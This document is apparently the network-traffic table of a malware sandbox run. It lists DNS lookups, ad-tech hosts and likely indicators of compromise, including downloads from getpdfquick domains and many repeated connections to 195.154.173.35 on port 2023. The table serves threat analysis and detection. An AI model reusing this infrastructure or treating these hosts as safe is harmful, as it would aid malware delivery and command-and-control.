| US | 8.8.8.8:53 | 71.87.29.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.42.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.8.184.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.241.63.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.23.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.66.251.34.in-addr.arpa | udp |
| US | 172.67.42.201:443 | useast.quantumdex.io | udp |
| US | 8.8.8.8:53 | a.teads.tv | udp |
| BE | 23.55.97.75:443 | a.teads.tv | tcp |
| US | 8.8.8.8:53 | 75.97.55.23.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | connectid.analytics.yahoo.com | udp |
| FR | 52.84.39.108:443 | cdn.prod.uidapi.com | tcp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| US | 8.8.8.8:53 | c886af10f2fba7004117c90d053c2a52.safeframe.googlesyndication.com | udp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| FR | 54.230.112.73:443 | tags.crwdcntrl.net | tcp |
| US | 172.64.152.89:443 | cdn-ima.33across.com | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| GB | 172.217.169.65:443 | c886af10f2fba7004117c90d053c2a52.safeframe.googlesyndication.com | tcp |
| FR | 18.161.97.52:443 | connectid.analytics.yahoo.com | tcp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 34.120.135.53:443 | oajs.openx.net | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| DE | 141.95.33.120:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| IE | 54.220.158.112:443 | bcp.crwdcntrl.net | tcp |
| US | 34.120.135.53:443 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| US | 35.244.159.8:443 | google-bidout-d.openx.net | tcp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| GB | 142.250.187.225:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.225:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.225:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.225:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.225:443 | cdn.ampproject.org | tcp |
| US | 8.8.8.8:53 | dcdn.adnxs.com | udp |
| US | 8.8.8.8:53 | cdn.adnxs.com | udp |
| US | 8.8.8.8:53 | 108.39.84.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.146.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.70.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.152.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.53.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.97.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.112.230.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.33.95.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.135.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.158.220.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.159.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| DE | 141.95.33.120:443 | id5-sync.com | tcp |
| US | 151.101.1.108:443 | dcdn.adnxs.com | tcp |
| GB | 2.21.188.221:443 | cdn.adnxs.com | tcp |
| US | 151.101.1.108:443 | dcdn.adnxs.com | tcp |
| GB | 2.21.188.221:443 | cdn.adnxs.com | tcp |
| US | 8.8.8.8:53 | acdn.adnxs.com | udp |
| US | 8.8.8.8:53 | sync.quantumdex.io | udp |
| US | 151.101.1.108:443 | acdn.adnxs.com | tcp |
| US | 8.8.8.8:53 | ce.lijit.com | udp |
| US | 8.8.8.8:53 | sync.richaudience.com | udp |
| IE | 54.171.72.23:443 | ce.lijit.com | tcp |
| DE | 167.235.114.248:443 | sync.richaudience.com | tcp |
| GB | 142.250.187.226:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | cacerts.rapidssl.com | udp |
| SE | 192.229.221.95:80 | cacerts.rapidssl.com | tcp |
| US | 8.8.8.8:53 | 108.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.188.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.72.171.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.114.235.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | shftr.adnxs.net | udp |
| DE | 162.19.138.83:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | choices.trustarc.com | udp |
| US | 8.8.8.8:53 | images1-focus-opensocial.googleusercontent.com | udp |
| US | 8.8.8.8:53 | trace-eu.mediago.io | udp |
| NL | 185.89.208.19:443 | shftr.adnxs.net | tcp |
| NL | 185.89.208.19:443 | shftr.adnxs.net | tcp |
| US | 8.8.8.8:53 | ams3-ib.adnxs.com | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| US | 8.8.8.8:53 | cs-server-s2s.yellowblue.io | udp |
| US | 8.8.8.8:53 | sync.adkernel.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| NL | 35.214.168.80:443 | trace-eu.mediago.io | tcp |
| NL | 35.214.168.80:443 | trace-eu.mediago.io | tcp |
| FR | 52.222.144.53:443 | choices.trustarc.com | tcp |
| GB | 172.217.16.225:443 | images1-focus-opensocial.googleusercontent.com | udp |
| US | 8.8.8.8:53 | match.sharethrough.com | udp |
| NL | 188.42.191.196:443 | ads.betweendigital.com | tcp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| DE | 51.89.9.252:443 | onetag-sys.com | tcp |
| DE | 51.89.9.252:443 | onetag-sys.com | tcp |
| US | 172.64.151.101:443 | ssum-sec.casalemedia.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 52.72.91.47:443 | cs-server-s2s.yellowblue.io | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| US | 8.8.8.8:53 | ssp.disqus.com | udp |
| US | 13.248.245.213:443 | eb2.3lift.com | tcp |
| GB | 2.21.188.239:443 | ads.pubmatic.com | tcp |
| DE | 18.197.199.178:443 | match.sharethrough.com | tcp |
| FR | 216.137.52.34:443 | s.ad.smaato.net | tcp |
| US | 35.171.81.170:443 | ssp.disqus.com | tcp |
| US | 8.8.8.8:53 | match.prod.bidr.io | udp |
| US | 172.64.151.101:443 | ssum-sec.casalemedia.com | udp |
| IE | 52.210.242.228:443 | match.prod.bidr.io | tcp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | us-u.openx.net | udp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | aorta.clickagy.com | udp |
| US | 18.211.202.82:443 | aorta.clickagy.com | tcp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | vid.vidoomy.com | udp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| DE | 51.89.9.252:443 | onetag-sys.com | udp |
| GB | 89.187.167.8:443 | vid.vidoomy.com | tcp |
| US | 8.8.8.8:53 | 83.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.208.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.168.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.245.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.151.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.57.245.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.9.89.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.144.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.174.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.199.197.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.191.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.188.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.52.137.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.81.171.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.242.210.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.91.72.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.40.223.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.149.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.202.211.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | ad.turn.com | udp |
| US | 8.8.8.8:53 | crt.sectigo.com | udp |
| US | 8.8.8.8:53 | i.liadm.com | udp |
| DE | 3.75.62.37:443 | ups.analytics.yahoo.com | tcp |
| US | 172.64.149.23:80 | crt.sectigo.com | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| US | 107.21.124.38:443 | i.liadm.com | tcp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 209.54.182.161:443 | s.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | sync.targeting.unrulymedia.com | udp |
| US | 8.8.8.8:53 | pixel-eu.rubiconproject.com | udp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| US | 8.8.8.8:53 | 8.167.187.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.164.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.62.75.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.182.54.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.124.21.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | p.rfihub.com | udp |
| US | 8.8.8.8:53 | dpm.demdex.net | udp |
| US | 8.8.8.8:53 | match.adsby.bidtheatre.com | udp |
| US | 8.8.8.8:53 | cm.ctnsnet.com | udp |
| NL | 193.0.160.131:443 | p.rfihub.com | tcp |
| IE | 52.17.32.208:443 | dpm.demdex.net | tcp |
| NL | 188.166.17.21:443 | match.adsby.bidtheatre.com | tcp |
| US | 35.186.193.173:443 | cm.ctnsnet.com | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | ssbsync.smartadserver.com | udp |
| US | 8.8.8.8:53 | cms.quantserve.com | udp |
| US | 8.8.8.8:53 | um.simpli.fi | udp |
| FR | 216.137.52.34:443 | s.ad.smaato.net | tcp |
| US | 8.8.8.8:53 | dsum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| US | 8.8.8.8:53 | data.adsrvr.org | udp |
| US | 52.223.40.198:443 | data.adsrvr.org | tcp |
| US | 8.2.110.134:443 | cs.krushmedia.com | tcp |
| DE | 91.228.74.159:443 | cms.quantserve.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| NL | 81.17.55.170:443 | ssbsync.smartadserver.com | tcp |
| NL | 35.204.74.118:443 | um.simpli.fi | tcp |
| US | 172.64.151.101:443 | dsum-sec.casalemedia.com | tcp |
| US | 172.64.151.101:443 | dsum-sec.casalemedia.com | tcp |
| US | 69.173.151.100:443 | pixel-us-east.rubiconproject.com | tcp |
| NL | 81.17.55.170:443 | ssbsync.smartadserver.com | tcp |
| DE | 91.228.74.159:443 | cms.quantserve.com | tcp |
| NL | 35.204.74.118:443 | um.simpli.fi | tcp |
| US | 69.173.151.100:443 | pixel-us-east.rubiconproject.com | tcp |
| US | 172.64.151.101:443 | dsum-sec.casalemedia.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| US | 8.2.110.134:443 | cs.krushmedia.com | tcp |
| US | 52.223.40.198:443 | data.adsrvr.org | tcp |
| US | 8.8.8.8:53 | bh.contextweb.com | udp |
| US | 8.8.8.8:53 | sync.serverbid.com | udp |
| NL | 185.89.210.212:443 | ams3-ib.adnxs.com | tcp |
| NL | 35.214.168.80:443 | trace-eu.mediago.io | udp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| IE | 34.251.66.169:443 | ap.lijit.com | tcp |
| FR | 3.160.196.25:443 | sync.serverbid.com | tcp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| NL | 35.214.168.80:443 | trace-eu.mediago.io | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| NL | 185.89.210.20:443 | ams3-ib.adnxs.com | tcp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 54.171.72.23:443 | ce.lijit.com | tcp |
| US | 8.8.8.8:53 | pixel-sync.sitescout.com | udp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | cr.frontend.weborama.fr | udp |
| US | 8.8.8.8:53 | mwzeom.zeotap.com | udp |
| US | 8.8.8.8:53 | creativecdn.com | udp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| US | 8.8.8.8:53 | pr-bh.ybp.yahoo.com | udp |
| DE | 3.75.62.37:443 | ups.analytics.yahoo.com | tcp |
| US | 8.8.8.8:53 | simage2.pubmatic.com | udp |
| IE | 54.77.98.227:443 | sync.crwdcntrl.net | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | tcp |
| US | 172.67.40.173:443 | mwzeom.zeotap.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| GB | 2.21.188.239:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | image2.pubmatic.com | udp |
| IE | 34.250.199.34:443 | pr-bh.ybp.yahoo.com | tcp |
| IE | 34.250.199.34:443 | pr-bh.ybp.yahoo.com | tcp |
| DK | 37.157.2.228:443 | c1.adform.net | tcp |
| GB | 185.64.191.210:443 | simage2.pubmatic.com | tcp |
| US | 52.73.192.158:443 | sync.srv.stackadapt.com | tcp |
| US | 52.73.192.158:443 | sync.srv.stackadapt.com | tcp |
| US | 52.73.192.158:443 | sync.srv.stackadapt.com | tcp |
| NL | 198.47.127.205:443 | image2.pubmatic.com | tcp |
| NL | 198.47.127.205:443 | image2.pubmatic.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| GB | 185.64.191.210:443 | simage2.pubmatic.com | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| GB | 185.64.191.210:443 | simage2.pubmatic.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | udp |
| US | 8.8.8.8:53 | ads.creative-serving.com | udp |
| US | 8.8.8.8:53 | gw-iad-bid.ymmobi.com | udp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| US | 47.253.61.56:443 | gw-iad-bid.ymmobi.com | tcp |
| US | 8.8.8.8:53 | pixel.tapad.com | udp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | tcp |
| NL | 35.214.241.248:443 | ads.creative-serving.com | tcp |
| US | 8.8.8.8:53 | 131.160.0.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.32.17.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.193.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.17.166.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.213.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.55.17.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.74.204.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.151.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.74.228.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.196.160.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.33.239.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.216.36.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.129.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.40.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.98.77.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.191.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.2.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.192.73.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | idsync.frontend.weborama.fr | udp |
| US | 8.8.8.8:53 | image4.pubmatic.com | udp |
| US | 34.111.131.239:443 | idsync.frontend.weborama.fr | tcp |
| NL | 35.214.241.248:443 | ads.creative-serving.com | udp |
| NL | 198.47.127.20:443 | image4.pubmatic.com | tcp |
| US | 8.8.8.8:53 | vpaid.vidoomy.com | udp |
| GB | 89.187.167.3:443 | vpaid.vidoomy.com | tcp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| US | 35.186.253.211:443 | rtb.openx.net | tcp |
| NL | 69.173.156.148:443 | pixel.rubiconproject.com | tcp |
| US | 13.248.245.213:443 | eb2.3lift.com | tcp |
| US | 35.186.253.211:443 | rtb.openx.net | tcp |
| US | 8.8.8.8:53 | 248.241.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.113.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.61.253.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.131.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.253.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dsp.adfarm1.adition.com | udp |
| DE | 85.114.159.93:443 | dsp.adfarm1.adition.com | tcp |
| US | 8.8.8.8:53 | sonata-notifications.taptapnetworks.com | udp |
| DE | 52.28.224.92:443 | sonata-notifications.taptapnetworks.com | tcp |
| US | 8.8.8.8:53 | sync-tm.everesttech.net | udp |
| US | 8.8.8.8:53 | ad.mrtnsvr.com | udp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| IE | 52.210.242.228:443 | match.prod.bidr.io | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| US | 8.8.8.8:53 | d5p.de17a.com | udp |
| US | 8.8.8.8:53 | csync.loopme.me | udp |
| SE | 213.155.156.165:443 | d5p.de17a.com | tcp |
| NL | 35.214.244.87:443 | csync.loopme.me | tcp |
| US | 8.8.8.8:53 | cm-supply-web.gammaplatform.com | udp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| US | 8.8.8.8:53 | ipac.ctnsnet.com | udp |
| US | 8.8.8.8:53 | core.iprom.net | udp |
| US | 8.8.8.8:53 | rtb-csync.smartadserver.com | udp |
| SI | 195.5.165.20:443 | core.iprom.net | tcp |
| NL | 81.17.55.106:443 | rtb-csync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | 92.224.28.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.159.114.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.163.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.156.155.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.244.214.35.in-addr.arpa | udp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| US | 8.8.8.8:53 | a.tribalfusion.com | udp |
| US | 8.8.8.8:53 | cm.adgrx.com | udp |
| US | 8.8.8.8:53 | green.erne.co | udp |
| US | 8.8.8.8:53 | getpdfquick.com | udp |
| FR | 141.95.171.141:443 | green.erne.co | tcp |
| IE | 54.217.19.5:443 | cm.adgrx.com | tcp |
| US | 104.18.24.173:443 | a.tribalfusion.com | tcp |
| FR | 3.160.196.129:443 | getpdfquick.com | tcp |
| FR | 3.160.196.129:443 | getpdfquick.com | tcp |
| US | 8.8.8.8:53 | pixel-eu.onaudience.com | udp |
| FR | 141.94.170.64:443 | pixel-eu.onaudience.com | tcp |
| US | 8.8.8.8:53 | s.tribalfusion.com | udp |
| US | 8.8.8.8:53 | matching.truffle.bid | udp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| US | 8.8.8.8:53 | 106.55.17.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.165.5.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.24.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.171.95.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.19.217.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.196.160.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.170.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| US | 8.8.8.8:53 | get-pdf-quick.s3.amazonaws.com | udp |
| DE | 18.184.216.10:443 | ps.eyeota.net | tcp |
| US | 52.217.126.177:443 | get-pdf-quick.s3.amazonaws.com | tcp |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| NL | 188.42.191.196:443 | ads.betweendigital.com | tcp |
| US | 151.101.66.137:443 | code.jquery.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | uipglob.semasio.net | udp |
| US | 8.8.8.8:53 | pixel.onaudience.com | udp |
| US | 8.8.8.8:53 | pubmatic-match.dotomi.com | udp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| NL | 188.166.17.21:443 | match.adsby.bidtheatre.com | tcp |
| FR | 141.94.171.214:443 | pixel.onaudience.com | tcp |
| DK | 77.243.51.122:443 | uipglob.semasio.net | tcp |
| NL | 89.207.16.137:443 | pubmatic-match.dotomi.com | tcp |
| US | 8.8.8.8:53 | d2mjkuteatdezc.cloudfront.net | udp |
| FR | 54.230.104.7:443 | d2mjkuteatdezc.cloudfront.net | tcp |
| US | 8.8.8.8:53 | simage4.pubmatic.com | udp |
| BE | 64.233.166.155:443 | stats.g.doubleclick.net | udp |
| US | 52.217.126.177:443 | get-pdf-quick.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | d3hie7oi3rbo2u.cloudfront.net | udp |
| FR | 3.160.203.181:443 | d3hie7oi3rbo2u.cloudfront.net | tcp |
| US | 8.8.8.8:53 | d.turn.com | udp |
| NL | 46.228.164.13:443 | d.turn.com | tcp |
| US | 8.8.8.8:53 | 196.120.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.216.184.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.126.217.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.171.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.203.160.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.104.230.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.51.243.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.164.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dl.getpdfquick.com | udp |
| DE | 212.227.17.162:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.instagram.com | udp |
| GB | 157.240.221.63:443 | i.instagram.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 63.221.240.157.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | d1jorhhovk7rc8.cloudfront.net | udp |
| FR | 54.230.104.94:80 | d1jorhhovk7rc8.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 94.104.230.54.in-addr.arpa | udp |
| DE | 141.101.120.10:443 | px.vliplatform.com | udp |
| FR | 54.230.104.132:443 | dn0diw4x4ljz4.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 32.94.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.153.230.54.in-addr.arpa | udp |
| DE | 212.227.17.162:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| IE | 54.171.72.23:443 | ce.lijit.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | www.google.com.kw | udp |
| GB | 142.250.178.3:443 | www.google.com.kw | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
